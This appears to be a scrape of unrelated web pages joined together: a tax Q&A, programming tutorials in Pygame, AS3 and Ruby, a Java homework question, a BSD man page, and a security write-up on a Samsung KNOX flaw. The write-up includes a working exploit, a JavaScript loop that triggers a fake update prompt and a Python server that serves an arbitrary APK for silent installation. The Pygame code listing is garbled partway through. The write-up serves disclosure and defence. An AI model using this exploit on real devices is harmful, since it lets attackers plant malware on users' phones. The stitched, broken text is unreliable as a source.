Debit cash, credit owner's capital ... BUT investing in the C-Corp is NOT the taxable event; the profit from the business is. But yes, you have it.

Back to your original question: it's being sure that you use all of the ordinary and necessary business expenses you can (including the contractor) on the Schedule C for the LLC on your taxes for this year; that will get that tax bill down. Hope this has helped. Lane

Yes it has. So no taxable event from the LLC providing owner's capital to the C-Corp.

Exactly, it's just taking your after-tax dollars and investing in your C-Corp (the tax benefit of that will come when you sell your C-Corp and have a lower capital gain because of it).

If this HAS helped, I would appreciate a feedback rating of 3 (OK) or better … That's the only way they will pay us here.
HOWEVER, if you need more on this, PLEASE COME BACK here, so you won't be charged for another ...
http://www.justanswer.com/tax/81aos-architect-several-businesses-a-sole-practitioner.html
Program Arcade Games
With Python And Pygame

Chapter 10: Controllers and Graphics

How do we get objects to move using the keyboard, mouse, or a game controller?

10.1 Introduction

So far, we've shown how to animate items on the screen, but not how to interact with them. How do we use a mouse, keyboard, or game controller to control the action on-screen? Thankfully this is pretty easy.

To begin with, it is necessary to have an object that can be moved around the screen. The best way to do this is to have a function that takes in an x and y coordinate, then draws an object at that location. So back to Chapter 9! Let's take a look at how to write a function to draw an object.

All the Pygame draw functions require a screen parameter to let Pygame know which window to draw on. We will need to pass this in to any function we create to draw an object on the screen. The function also needs to know where to draw the object on the screen. The function needs an x and y. We pass the location to the function as a parameter.

Here is example code that defines a function that will draw a snowman when called:

def draw_snowman(screen, x, y):
    # Draw a circle for the head
    pygame.draw.ellipse(screen, WHITE, [35 + x, y, 25, 25])
    # Draw the middle snowman circle
    pygame.draw.ellipse(screen, WHITE, [23 + x, 20 + y, 50, 50])
    # Draw the bottom snowman circle
    pygame.draw.ellipse(screen, WHITE, [x, 65 + y, 100, 100])

Then, in the main program loop, multiple snowmen can be drawn, as seen in Figure 10.1.

# Snowman in upper left
draw_snowman(screen, 10, 10)

# Snowman in upper right
draw_snowman(screen, 300, 10)

# Snowman in lower left
draw_snowman(screen, 10, 300)

A full working example is available on-line at:
ProgramArcadeGames.com/python_examples/f.php?file=functions_and_graphics.py

Chances are, from a prior lab you already have code that draws something cool. But how do you get that into a function?
Let's take an example of code that draws a stick figure:

[stick figure code listing]

This code can easily be put in a function by adding a function def and indenting the code under it. We'll need to bring in all the data that the function needs to draw the stick figure. We need the screen variable to tell the function what window to draw on, and an x and y coordinate for where to draw the stick figure. But we can't define the function in the middle of our program loop! The code should be removed from the main part of the program. Function declarations should go at the start of the program. We need to move that code to the top. See Figure 10.3 to help visualize.

def draw_stick_figure(screen, x, y):
    [stick figure code listing, indented under the def]

Right now, this code takes in an x and y coordinate. Unfortunately it doesn't actually do anything with them. You can specify any coordinate you want, and the stick figure always draws in the same exact spot. Not very useful. The next code example literally adds in the x and y coordinate to the code we had before.

def draw_stick_figure(screen, x, y):
    # Head
    pygame.draw.ellipse(screen, BLACK, [96+x,83+y,10,10], 0)

    # Legs
    pygame.draw.line(screen, BLACK, [100+x,100+y], [105+x,110+y], 2)
    pygame.draw.line(screen, BLACK, [100+x,100+y], [95+x,110+y], 2)

    # Body
    pygame.draw.line(screen, RED, [100+x,100+y], [100+x,90+y], 2)

    # Arms
    pygame.draw.line(screen, RED, [100+x,90+y], [104+x,100+y], 2)
    pygame.draw.line(screen, RED, [100+x,90+y], [96+x,100+y], 2)

But the problem is that the figure is already drawn a certain distance from the origin. It assumes an origin of (0, 0) and draws the stick figure down and over about 100 pixels. See Figure 10.4 and how the stick figure is not drawn at the (0, 0) coordinate passed in. By adding x and y in the function, we shift the origin of the stick figure by that amount. For example, if we call:

draw_stick_figure(screen, 50, 50)

The code does not put a stick figure at (50, 50). It shifts the origin down and over 50 pixels.
Since our stick figure was already being drawn at about (100, 100), the origin shift puts the figure at about (150, 150). How do we fix this so that the figure is actually drawn where the function call requests? Find the smallest x value and the smallest y value, as shown in Figure 10.5. Then subtract those values from each x and y in the function. Don't mess with the height and width values. Here's an example where we subtracted the smallest x and y values:

def draw_stick_figure(screen, x, y):
    # Head
    pygame.draw.ellipse(screen, BLACK, [96-95+x,83-83+y,10,10], 0)

    # Legs
    pygame.draw.line(screen, BLACK, [100-95+x,100-83+y], [105-95+x,110-83+y], 2)
    pygame.draw.line(screen, BLACK, [100-95+x,100-83+y], [95-95+x,110-83+y], 2)

    # Body
    pygame.draw.line(screen, RED, [100-95+x,100-83+y], [100-95+x,90-83+y], 2)

    # Arms
    pygame.draw.line(screen, RED, [100-95+x,90-83+y], [104-95+x,100-83+y], 2)
    pygame.draw.line(screen, RED, [100-95+x,90-83+y], [96-95+x,100-83+y], 2)

Or, to make the program simpler, do the subtraction yourself:

def draw_stick_figure(screen, x, y):
    # Head
    pygame.draw.ellipse(screen, BLACK, [1+x,y,10,10], 0)

    # Legs
    pygame.draw.line(screen, BLACK, [5+x,17+y], [10+x,27+y], 2)
    pygame.draw.line(screen, BLACK, [5+x,17+y], [x,27+y], 2)

    # Body
    pygame.draw.line(screen, RED, [5+x,17+y], [5+x,7+y], 2)

    # Arms
    pygame.draw.line(screen, RED, [5+x,7+y], [9+x,17+y], 2)
    pygame.draw.line(screen, RED, [5+x,7+y], [1+x,17+y], 2)

10.2 Mouse

Great, now we know how to write a function to draw an object at specific coordinates. How do we get those coordinates? The easiest to work with is the mouse. It takes one line of code to get the coordinates:

pos = pygame.mouse.get_pos()

The trick is that the coordinates are returned as a list, or more specifically a non-modifiable tuple. Both the x and y values are stored in the same variable. So if we do a print(pos) we get what is shown in Figure 10.6. The variable pos is a tuple of two numbers.
The x coordinate is in position 0 of the tuple and the y coordinate is in position 1. These can easily be fetched out and passed to the function that draws the item:

# Game logic
pos = pygame.mouse.get_pos()
x = pos[0]
y = pos[1]

# Drawing section
draw_stick_figure(screen, x, y)

Getting the mouse position should go in the "game logic" part of the main program loop. The function call should go in the "drawing" part of the main program loop.

The only problem with this is that the mouse pointer draws right on top of the stick figure, making it hard to see, as shown in Figure 10.7. The mouse can be hidden by using the following code right before the main program loop:

# Hide the mouse cursor
pygame.mouse.set_visible(False)

A full working example can be found here:
ProgramArcadeGames.com/python_examples/f.php?file=move_mouse.py

10.3 Keyboard

Controlling with the keyboard is a bit more complex. We can't just grab the x and y from the mouse; the keyboard doesn't give us an x and y. We need to:

- Create an initial x and y for our start position.
- Set a "velocity" in pixels per frame when an arrow key is pressed down. (keydown)
- Reset the velocity to zero when an arrow key is released. (keyup)
- Adjust the x and y each frame depending on the velocity.

It seems complex, but this is just like the bouncing rectangle we did before, with the exception that the speed is controlled by the keyboard. To start with, set the location and speed before the main loop starts:

# Speed in pixels per frame
x_speed = 0
y_speed = 0

# Current position
x_coord = 10
y_coord = 10

Inside the main while loop of the program, we need to add some items to our event processing loop. In addition to looking for a pygame.QUIT event, the program needs to look for keyboard events. An event is generated each time the user presses a key. A pygame.KEYDOWN event is generated when a key is pressed down. A pygame.KEYUP event is generated when the user lets up on a key.
When the user presses a key, the speed vector is set to 3 or -3 pixels per frame. When the user lets up on a key, the speed vector is reset back to zero. Finally, the coordinates of the object are adjusted by the vector, and then the object is drawn. See the code example below:

for event in pygame.event.get():
    if event.type == pygame.QUIT:
        done = True

    # User pressed down on a key
    elif event.type == pygame.KEYDOWN:
        # Figure out if it was an arrow key. If so
        # adjust speed.
        if event.key == pygame.K_LEFT:
            x_speed = -3
        elif event.key == pygame.K_RIGHT:
            x_speed = 3
        elif event.key == pygame.K_UP:
            y_speed = -3
        elif event.key == pygame.K_DOWN:
            y_speed = 3

    # User let up on a key
    elif event.type == pygame.KEYUP:
        # If it is an arrow key, reset the speed vector back to zero
        if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
            x_speed = 0
        elif event.key == pygame.K_UP or event.key == pygame.K_DOWN:
            y_speed = 0

# Move the object according to the speed vector.
x_coord += x_speed
y_coord += y_speed

# Draw the stick figure
draw_stick_figure(screen, x_coord, y_coord)

For a full example see:
ProgramArcadeGames.com/python_examples/f.php?file=move_keyboard.py

Note that this example does not prevent the character from moving off the edge of the screen. To do this, in the game logic section, a set of if statements would be needed to check the x_coord and y_coord values. If they are outside the boundaries of the screen, then reset the coordinates to the edge. The exact code for this is left as an exercise for the reader.

The table below shows a full list of key-codes that can be used in Pygame:

10.4 Game Controller

Game controllers require a different set of code, but the idea is still simple. To begin, check to see if the computer has a joystick, and initialize it before use. This should only be done once. Do it ahead of the main program loop:

# Current position
x_coord = 10
y_coord = 10

# Count the joysticks the computer has
joystick_count = pygame.joystick.get_count()
if joystick_count == 0:
    # No joysticks!
    print("Error, I didn't find any joysticks.")
else:
    # Use joystick #0 and initialize it
    my_joystick = pygame.joystick.Joystick(0)
    my_joystick.init()

A joystick will return two floating point values.
If the joystick is perfectly centered it will return (0, 0). If the joystick is fully up and to the left it will return (-1, -1). If the joystick is down and to the right it will return (1, 1). If the joystick is somewhere in between, the values are scaled accordingly. See the controller images starting at Figure 10.8 to get an idea how it works.

Inside the main program loop, the values the joystick returns may be multiplied according to how far an object should move. In the case of the code below, moving the joystick fully in a direction will move the object 10 pixels per frame, because the joystick values are multiplied by 10.

# This goes in the main program loop!

# As long as there is a joystick
if joystick_count != 0:
    # This gets the position of the axis on the game controller
    # It returns a number between -1.0 and +1.0
    horiz_axis_pos = my_joystick.get_axis(0)
    vert_axis_pos = my_joystick.get_axis(1)

    # Move x according to the axis. We multiply by 10 to speed up the movement.
    # Convert to an integer because we can't draw at pixel 3.5, just 3 or 4.
    x_coord = x_coord + int(horiz_axis_pos * 10)
    y_coord = y_coord + int(vert_axis_pos * 10)

# Clear the screen
screen.fill(WHITE)

# Draw the item at the proper coordinates
draw_stick_figure(screen, x_coord, y_coord)

For a full example, see ProgramArcadeGames.com/python_examples/f.php?file=move_game_controller.py.

Controllers have a lot of joysticks, buttons, and even "hat" switches. Below is an example program and screenshot that prints everything to the screen, showing what each game controller is doing. Take heed that game controllers must be plugged in before this program starts, or the program can't detect them.
""" Sample Python/Pygame Programs Simpson College Computer Science Show everything we can pull off the joystick """ import pygame # Define some colors BLACK = (0, 0, 0) WHITE = (255, 255, 255) class TextPrint(object): """ This is a simple class that will help us print to the screen It has nothing to do with the joysticks, just outputting the information. """ def __init__(self): """ Constructor """ self.reset() self.x_pos = 10 self.y_pos = 10 self.font = pygame.font.Font(None, 20) def print(self, my_screen, text_string): """ Draw text onto the screen. """ text_bitmap = self.font.render(text_string, True, BLACK) my_screen.blit(text_bitmap, [self.x_pos, self.y_pos]) self.y_pos += self.line_height def reset(self): """ Reset text to the top of the screen. """ self.x_pos = 10 self.y_pos = 10 self.line_height = 15 def indent(self): """ Indent the next line of text """ self.x_pos += 10 def unindent(self): """ Unindent the next line of text """ self.x_pos -= not done: # EVENT PROCESSING STEP for event in pygame.event.get(): if event.type == pygame.QUIT: done = True # 60 frames per second clock.tick(60) # Close the window and quit. # If you forget this line, the program will 'hang' # on exit if running from IDLE. pygame.quit() 10.5 Review 10.5.1 Multiple Choice Quiz 10.5.2 Short Answer Worksheet 10
http://programarcadegames.com/index.php?chapter=controllers_and_graphics&lang=pt-br
UPDATE: A way to patch the vulnerability is provided at the end of the article. The S4, S4 mini, Note 3 and Ace 4 (and possibly others) are still vulnerable.

Introduction

At Quarkslab, we like to play with Android devices. So on the release day of the Samsung Galaxy S5 we took a look at the firmware to search for issues. We quickly spotted a simple vulnerability and had a working exploit.

The vulnerable application is UniversalMDMApplication; its goal is to make user enrollment easier for enterprises. This application is present by default in the Samsung Galaxy S5 ROM (and many others) and is part of the Samsung KNOX security solution for enterprise. When launched with special attributes, we can fool the vulnerable application into thinking that an update is available. The result is a popup shown by the vulnerable application asking the user if he wants to update or not. If the user chooses "yes", an arbitrary application is installed; if not, we can relaunch the popup, making the user think the "cancel" button is not working...

Our vulnerability can be triggered via a mail (by clicking on a crafted link) or by browsing a malicious page in Chrome or the stock browser. The vulnerability can also be triggered when the attacker is in a MITM (Man In The Middle) position, as we can inject arbitrary JavaScript code inside HTML pages accessed over HTTP.

We kept this vulnerability undisclosed because we thought this could be a good one for the mobile Pwn2Own, but the rules are stricter this year, maybe too strict (they removed the USB category because it means user interaction... come on guys...). With the new rules, the victim is only authorized to click one time, to open the malicious content and nothing else. So when the popup appears, even if most users will click on "yes", for the Pwn2Own guys it is already an invalid vulnerability.
Even without the problem of "user interaction", this vulnerability was patched in August on the Samsung Note 4 and Alpha, but not until October for the Samsung Galaxy S5, and thus could not be used anymore for the Pwn2Own. This article describes how the vulnerability works and tries to make developers more aware of this kind of bug. A video showing the exploitation of the vulnerability is also present.

Timeline:
- April 2014 - Release of the Samsung Galaxy S5 and discovery of the vulnerability.
- August 2014 - Release of the Samsung Galaxy Note 4 and Alpha. The vulnerability is patched in their release ROMs.
- October 2014 - The vulnerability is patched in the Samsung Galaxy S5.
- November 2014 - Mobile Pwn2Own contest.

To our knowledge the following models are still vulnerable:
- Samsung Galaxy S4 (version checked: I9505XXUGNH8)
- Samsung Galaxy S4 mini (version checked: I9190UBUCNG1)
- Samsung Galaxy Note 3 (version checked: N9005XXUGNG1)
- Samsung Galaxy Ace 4 (version checked: G357FZXXU1ANHD)

Warning: this list is not exhaustive and other models can also be vulnerable.

UPDATE: A way to patch the vulnerability is provided at the end of the article.

The vulnerability

Short writeup

The UniversalMDMClient application is installed by default as part of Samsung KNOX. It registers a custom URI scheme, "smdm://". When a user clicks on a link to open a URL starting with "smdm://", the LaunchActivity component of UniversalMDMClient is started and parses the URL. Much information is extracted from the URL, among it an update server URL.

After having extracted the update server URL, the application does a HEAD request on that URL and checks whether the server returns the non-standard header "x-amz-meta-apk-version". If it does, it compares the current version of the UniversalMDMClient application to the version specified in the "x-amz-meta-apk-version" header.
If the version in the header is more recent, the application shows a popup to the user explaining that an update is available and asking if he wants to install it or not. If the user chooses "yes", the application does a GET on the update server URL and the body of the answer is saved as an APK file. Last but not least, it is installed without prompting the user about the permissions requested by the application or checking the certificate used to sign the APK. Hence, if an attacker can trick the user into accepting the update, he can install an arbitrary application with arbitrary permissions.

The vulnerability was patched in October 2014 by checking that the package name of the downloaded APK is the same as the package name of the UniversalMDMClient application. Since it is not possible to have two applications with the same package name signed by two different certificates, it becomes impossible to install an arbitrary application.

Detailed writeup

Looking at the UniversalMDMClient AndroidManifest.xml file, we can see that it defines a custom URI: the intent-filter registers (lines 11-16) the custom URI "smdm://" and associates it with the com.sec.enterprise.knox.cloudmdm.smdms.ui.LaunchActivity component. When the user (or his browser ;) ) tries to open an "smdm://" URI, the onCreate() method of LaunchActivity handles the situation. From here, we dive into the code. Although the application has been ""obfuscated"" by ProGuard, it is not really a problem to analyse it using the JEB decompiler and its ability to let the user rename methods and classes.

Below is the decompiled and renamed source code of the onCreate() method: the first thing onCreate() does is check (via the function getPreETAG()) for the presence of a file named PreETag.xml inside the directory /data/data/com.sec.enterprise.knox.cloudmdm.smdms/shared_prefs/. If the file exists, the application aborts its execution by calling the finish() method.
By default, the file PreETag.xml does not exist. The application then tries to get the Intent used to start the Activity, and more precisely the data attached to it. The data must be of the form "smdm://hostname?var1=value1&var2=value2". The parsed variable names can easily be obtained from the source: seg_url, update_url, email, mdm_token, program and quickstart_url. The most important is update_url. After writing all these variable values into a shared preference file, onCreate() ends by calling Core.startSelfUpdateCheck().

Core.startSelfUpdateCheck() checks whether an update is currently in progress; if not, it calls UMCSelfUpdateManager.startSelfUpdateCheck(). That function verifies that a data connection is available, deletes any pending update, constructs a URL based on the value of the umc_cdn string inside the shared preference file "m.xml" and appends the constant string "/latest" to it. The value of umc_cdn is the value of our Intent data variable update_url, so this is a value fully controlled by an attacker. It then calls UMCSelfUpdateManager.doUpdateCheck() with the previously constructed URL as first parameter.

Inside this function, a ContentTransferManager instance is initialized and an HTTP HEAD request is performed on the attacker-controlled URL. The different states encountered during the life of the HTTP request are handled by the handleRequestResult class and its methods onFailure(), onProgress(), onStart(), onSuccess(), etc. The most interesting method is of course onSuccess(). It checks that several headers are present: ETag, Content-Length and x-amz-meta-apk-version. The value of the x-amz-meta-apk-version header is compared to the current UniversalMDMApplication APK package version. If the header contains a number bigger than the current APK version, then an update is needed.
At this point a popup appears on the screen, explaining to the user that an update for the application is available and asking if he wants to install it or not. If he chooses "yes", we can continue our analysis, and the attack: UMCSelfUpdateManager.onSuccess() is called and, before returning, it calls its parent's onSuccess() method. This onSuccess() finally calls beginUpdateProcess(), which starts an update thread. The update thread calls installApk(), which in turn calls _installApplication(), whose role is to disable the package verifier (to prevent Google from scanning the APK at installation), install the APK and re-enable the package verifier.

And... that's all. At no point is the downloaded APK's authenticity checked, nor are the requested permissions shown to the user. Hence, this vulnerability allows an attacker to install an arbitrary application.

Once the update has been installed, it is not possible to exploit the vulnerability anymore: after a successful update, the value of the ETag header is written to /data/data/com.sec.enterprise.knox.cloudmdm.smdms/shared_prefs/PreETag.xml, and the existence of that file is the first check done inside the onCreate() method of LaunchActivity. If the file already exists, the method calls finish() and execution aborts.

The patch by Samsung

In order to prevent the installation of an arbitrary APK, the application now checks the package name before installing it. The APK package name must be the same as the package name of UniversalMDMApplication. This means the APK must be an update of UniversalMDMApplication signed by the same certificate; thus it is not possible to install an arbitrary application anymore.
Below is the function performing the check. The following popup appears on a patched system:

The exploit

The exploit is pretty simple: you have to make your victim open your custom URI, either by making him click on it in a mail or by redirecting to it with JavaScript in a web page:

<script>
function trigger(){
    document.location = "smdm://meow?update_url=";
}
setTimeout(trigger, 5000);
</script>

The interesting fact about triggering the exploit via JavaScript code inside a web page is that if the user chooses "cancel" and denies the update, Android gives focus back to our web page and resumes the execution of our JavaScript code. This means we can loop inside the JavaScript code and re-trigger the vulnerability. This is so quick that an average user will think the "cancel" button of the popup is not working correctly. If the user chooses "yes", it will install the arbitrary APK and prevent further runs of the application.

For the server part you have to return the following headers:
- x-amz-meta-apk-version : an arbitrary number, but abnormally big for a version number, like 1337 ;
- ETag : the md5sum of the arbitrary APK ;
- Content-Length : the size of the arbitrary APK (used by the progress bar).
Here is the code of the server part:

import hashlib
from BaseHTTPServer import BaseHTTPRequestHandler

APK_FILE = "meow.apk"
APK_DATA = open(APK_FILE, "rb").read()
APK_SIZE = str(len(APK_DATA))
APK_HASH = hashlib.md5(APK_DATA).hexdigest()

class MyHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Length", APK_SIZE)
        self.send_header("ETag", APK_HASH)
        self.send_header("x-amz-meta-apk-version", "1337")
        self.end_headers()
        self.wfile.write(APK_DATA)
        return

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Length", APK_SIZE)
        self.send_header("ETag", APK_HASH)
        self.send_header("x-amz-meta-apk-version", "1337")
        self.end_headers()
        return

if __name__ == "__main__":
    from BaseHTTPServer import HTTPServer
    server = HTTPServer(('0.0.0.0', 8080), MyHandler)
    server.serve_forever()

Below is a video showing the exploit on a patched and unpatched version of the Samsung Galaxy S5:
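For clarity, the client-side decision this server tricks boils down to a single header comparison. This is a sketch based on the write-up above, not decompiled Samsung code; the parsing details (integer comparison, missing-header handling) are assumptions:

```python
def update_popup_triggered(headers, current_apk_version):
    # The client HEADs the attacker-supplied update_url and compares
    # the non-standard x-amz-meta-apk-version header with its own
    # package version; a bigger value triggers the update popup.
    value = headers.get("x-amz-meta-apk-version")
    if value is None:
        return False
    try:
        return int(value) > current_apk_version
    except ValueError:
        return False
```

With the server above advertising version 1337, any realistic installed version loses the comparison, which is why an abnormally big number is a reliable trigger.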
https://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
I am having problems figuring out how to get the results from the strings and then give myself the option to sort through them alphabetically (or numerically). I have the code to the point where it shows the input data but don't know where to go from there. I'm fairly new to Java so I don't even know if I'm doing the first part right. I have looked into sort options with Arrays but am not too sure how to use them (or if I have done it right to allow myself to use them). Any help would be appreciated. Below is a copy of my code.

The question I am trying to solve is: "Your program should then use a menu that allows the user to display, search and exit. Display should display the list of the entries, sorted by last name, first name, or birth-date as requested by the user. Search should search for a specific entry by a specific field (last name, first name or birth-date) as requested by the user."

import javax.swing.JOptionPane;

public class Program2 {

    //Loop #
    public static void main(String[] args) {
        int Runs;
        do {
            String runQuestion = JOptionPane.showInputDialog(null,
                "Number of patients to enter in? (1-2)",
                "Total # Of Patients", JOptionPane.QUESTION_MESSAGE);
            Runs = Integer.parseInt(runQuestion);
            if (Runs < 1 || Runs > 2) {
                //Small test numbers for now
                JOptionPane.showMessageDialog(null,
                    "Please pick a number between 1 and 2",
                    "Wrong Number Chosen", JOptionPane.INFORMATION_MESSAGE);
            }
        } while (Runs < 1 || Runs > 2);
        Questions(Runs);
    }

    //Data Gathering Questions
    public static void Questions(int Runs) {
        for (char index = 0; index < Runs; index++) {
            //Questions
            String firstName = JOptionPane.showInputDialog(null,
                "Patients First Name?", "First Name", JOptionPane.QUESTION_MESSAGE);
            String lastName = JOptionPane.showInputDialog(null,
                "Patients Last Name?", "Last Name", JOptionPane.QUESTION_MESSAGE);
            String dateBirth = JOptionPane.showInputDialog(null,
                "Patients Date of Birth?", "DOB", JOptionPane.QUESTION_MESSAGE);
            String firstSort = String firstName;
            //Data Table print list
            System.out.println(firstName + " " + lastName + " " + dateBirth);
        }
    }
}
https://www.daniweb.com/programming/software-development/threads/383948/display-search-and-exit-string-inputs
Map particles to letters in AS3

I saw a banner advert on a website where the particles formed different letters and shapes, then dispersed to create new letters and shapes. The particle letters were made from circles evenly spaced apart to form the outline of the letters. I will attempt to recreate this effect in two sections. The first section will create a single word and the second section will create a library of letters which can be used to form multiple words.

The process of mapping particles to letters starts with drawing the text to be mapped on the stage. The coordinates of the particles are stored using the BitmapData class to work out the width and height spacing of the letters. Once the coordinate data has been stored, the particles can be generated and animated.

Single Word

Step 1 – Draw letters on stage

Create a new AS3 file and save it with the name: MapParticles. Select the Text tool with static text and black colour, and type your message on the stage. Convert the text into a movie clip (F8), ensuring the top-left registration point is selected and the instance name is: letters. Also make sure the movie clip is positioned at (0, 0) on the stage. Open a new AS3 file, save it with the name: MapParticles, and add the following setup code.
package {

	import flash.display.BitmapData;
	import flash.display.Sprite;
	import flash.display.MovieClip;
	import com.greensock.TweenMax;
	import com.greensock.easing.*;

	public class MapParticles extends MovieClip {

		private var positions:Array = [];
		private var SPACING_Y:uint = 5;
		private var SPACING_X:uint = 5;
		private var circlesArray:Array = [];
		private var circleRadius:uint = 3;
		private var container:Sprite;

		public function MapParticles() {

		}

		private function shuffle(arr:Array):void {
			var l:int = arr.length;
			var i:int = 0;
			var rand:int;
			for(; i < l; i++) {
				var tmp:* = arr[int(i)];
				rand = int(Math.random() * l);
				arr[int(i)] = arr[rand];
				arr[int(rand)] = tmp;
			}
		}
	}
}

Step 2 – Store letter coordinates

In the constructor add the following code. This creates a BitmapData copy of the movie clip and adds the x and y positions of the black pixels to the positions array, with a 5 pixel vertical and horizontal spacing. The shuffle function randomises the positions array, and generateParticles() creates the particles; it will be written in the next step.

//hides the letters movie clip
letters.visible = false;

//particle container
container = new Sprite();
addChild(container);

//bitmapdata of letters
var bmd:BitmapData = new BitmapData(letters.width, letters.height, false, 0xffffff);
bmd.draw(letters);

//total rows and total columns
var rows:int = letters.height / SPACING_Y;
var cols:int = letters.width / SPACING_X;

//add the x and y pixel values to the array with a spacing of 5 pixels
for(var i:int = 0; i < cols; i++){
	for(var j:int = 0; j < rows; j++){
		var pixelValue:uint = bmd.getPixel(i * SPACING_X, j * SPACING_Y);
		if(pixelValue.toString(16) != 'ffffff' && pixelValue.toString(16) != '0'){
			positions.push({xpos:i * SPACING_X, ypos:j * SPACING_Y });
		}
	}
}

//randomise positions array
shuffle(positions);

//generate particles
generateParticles();

Step 3 – Generate particles

Once the x and y particle positions have been stored, the particles can be generated.
I have used the Graphics API to draw circles with random colours and a radius of 3 pixels. The x and y positions of the particles are set by the positions array.

private function generateParticles():void {
	for(var i:int = 0; i < positions.length; i++) {
		var circle:Sprite = new Sprite();
		circle.graphics.beginFill(Math.random() * 0xffffff);
		circle.graphics.drawCircle(0, 0, circleRadius);
		circle.graphics.endFill();
		container.addChild(circle);
		circle.x = Math.random() * stage.stageWidth;
		circle.y = Math.random() * stage.stageHeight;
		circle.alpha = 0;
		circlesArray.push(circle);
	}
}

Step 4 – Animate particles

The particles have been created and are now ready to be animated. I have used the greensock TweenMax class to animate the particles. The particles are animated and dispersed using the animateParticles() and disperseParticles() functions.

private function animateParticles():void {
	for(var i:int = 0; i < circlesArray.length; i++) {
		TweenMax.to(circlesArray[i], 1, { x:positions[i].xpos, y:positions[i].ypos, alpha:1, delay:i * 0.01, ease:Back.easeOut, easeParams:[3]});
	}
}

private function disperseParticles():void {
	for(var i:int = 0; i < circlesArray.length; i++) {
		TweenMax.to(circlesArray[i], 1, { x:Math.random() * stage.stageWidth, y:Math.random() * stage.stageHeight, alpha:0, delay:i * 0.01, ease:Back.easeIn, easeParams:[1]});
	}
}

4 comments:

Love this tutorial but unfortunately I'm new to ac3 and after following the directions i can't seem to get this to work. is the first code part of the package(class) or do all of these codes go into the same .as file and how to get this into flash "import MapParticles."? Sorry for the dumb questions but I would love to get to know who to do this stuff. thanks

@Russell, Sorry to be blunt, but if you don't know how to use Class files. Then this tutorial is probably too advanced for you at this stage.

hi :) I am using flash cs6. i've already retype the code but nothing happened.
I download greensock tweenmax and the others here is it wrong? if it's wrong please give mw the correct link. if I right to download the files there, what should I do ?? thank you @Hima, Be sure you have completed step 4.
http://www.ilike2flash.com/2013/05/map-particles-to-letters-in-as3.html
SHUTDOWNHOOK_ESTABLISH(9)     BSD Kernel Manual     SHUTDOWNHOOK_ESTABLISH(9)

NAME
     shutdownhook_establish, shutdownhook_disestablish - add or remove a
     shutdown hook

SYNOPSIS
     #include <sys/types.h>
     #include <sys/systm.h>

     void *
     shutdownhook_establish(void (*fn)(void *), void *arg);

     void
     shutdownhook_disestablish(void *cookie);

DESCRIPTION
     The shutdownhook_establish() function adds fn to the list of hooks
     invoked by doshutdownhooks(9) at shutdown. When invoked, the hook
     function fn is passed arg as its only argument. The hook function should
     not rely on normal system services (such as interrupts, timeouts, and
     other interrupt-driven services) or even basic system integrity (because
     the system could be rebooting after a crash).

     Shutdown hooks are, like startup hooks, implemented via the more general
     dohooks(9) API.

RETURN VALUES
     If successful, shutdownhook_establish() returns an opaque pointer
     describing the newly established shutdown hook. Otherwise, it returns
     NULL.

EXAMPLES
     It may be appropriate to use a shutdown hook to disable a device that
     does direct memory access, so that the device will not try to access
     memory while the system is rebooting.

     It may be appropriate to use a shutdown hook to inform watchdog timer
     hardware that the operating system is no longer running.

SEE ALSO
     dohooks(9), doshutdownhooks(9), dostartuphooks(9)

CAVEATS
     Shutdown hooks should only be used to do what is strictly necessary to
     ensure a correct reboot. Since shutdown hooks are run even after a panic,
     a panic caused by a shutdown hook will automatically cause the shutdown
     hook to be run again, causing an endless loop. An example of things that
     need to be done in a shutdown hook is stopping DMA engines that might
     corrupt memory when rebooting. An example of things that should not be
     done in a shutdown hook is syncing the file systems. Once again, since
     the system could be rebooting because of an internal inconsistency,
     writing anything to permanent storage or trusting the internal state of
     the system is a very bad idea.

     The names are clumsy, at best.
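As an illustration of the usage described above, a hypothetical driver might establish a hook at attach time and remove it at detach time. This is a sketch only: the mydev names and the softc layout are invented for the example, and it is kernel code rather than a standalone program.

    #include <sys/types.h>
    #include <sys/systm.h>

    static void
    mydev_shutdown(void *arg)
    {
            struct mydev_softc *sc = arg;

            /* Do strictly the minimum needed for a clean reboot:
             * stop the device's DMA engine (hypothetical helper). */
            mydev_stop_dma(sc);
    }

    void
    mydev_attach(struct mydev_softc *sc)
    {
            sc->sc_sdhook = shutdownhook_establish(mydev_shutdown, sc);
            if (sc->sc_sdhook == NULL)
                    printf("mydev: unable to establish shutdown hook\n");
    }

    void
    mydev_detach(struct mydev_softc *sc)
    {
            if (sc->sc_sdhook != NULL)
                    shutdownhook_disestablish(sc->sc_sdhook);
    }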
http://mirbsd.mirsolutions.de/htman/sparc/man9/shutdownhook_establish.htm
Guessing Game - Online Code

Description

Briefing: In this game, the user and the computer each choose an option between stone, scissors and paper. Stone wins over scissors, scissors over paper, and paper over stone: Stone -> Scissors -> Paper -> Stone... The first to win WINSCORE times is the competition winner.

Source Code

#include <iostream.h>
#include <stdlib.h>
#include <time.h>

#define WINSCORE 3

// Function PickRandomOption
// * Returns a random character between 's', 'x', and 'p'
char PickRandomOption (void)
{
    char opti...
http://www.getgyan.com/show/341/Guessing_Game
Introduction to Regular Expression in Ruby

Regular expressions in Ruby are sequences of characters used to search for matching strings. For example, if you are searching for "sofa" in the sentence "sofa is beautiful", you can write "sofa is beautiful" =~ /sofa(.*)/ - here we are simply checking whether "sofa" occurs inside the sentence "sofa is beautiful". This shows the importance of regular expressions in Ruby: with their help we can search for very complex strings or sets of strings, and we can use them to validate requests - for example, treating a request as valid only if the request string contains a given pattern.

Syntax

Below is the syntax for a regular expression in Ruby. In the given line of code we have written /pattern/, so here we are simply checking for the pattern, and within the same pattern we can specify character classes and ranges. For example, /\d/ matches any digit (while /\D/ matches any non-digit). We can also write it in a way like /[a-z]/, which matches any lowercase letter from a to z. We will focus more on the syntax in the example part. Optional modifiers can be placed after the closing slash, once the inner pattern is complete - for example, i makes the match case-insensitive.

/search string or pattern/optional modifiers

Examples to Implement Regular Expression in Ruby

We can use regular expressions in many real-time situations: when we have to find some specific pattern in a given sentence, when we want to replace a matched pattern, or even when we want to test whether a given string or set of strings follows a given format. Let us discuss all these situations with examples.

Example #1

Operators used in the given example and their meaning.

- =~ : here we are using the operator =~ , which connects two things - a regular expression on one side and the string to match against on the other.
- (.*) : This matches any sequence of characters after the search term, so /sofa(.*)/ matches the complete word "sofa" plus whatever follows it in the sentence.

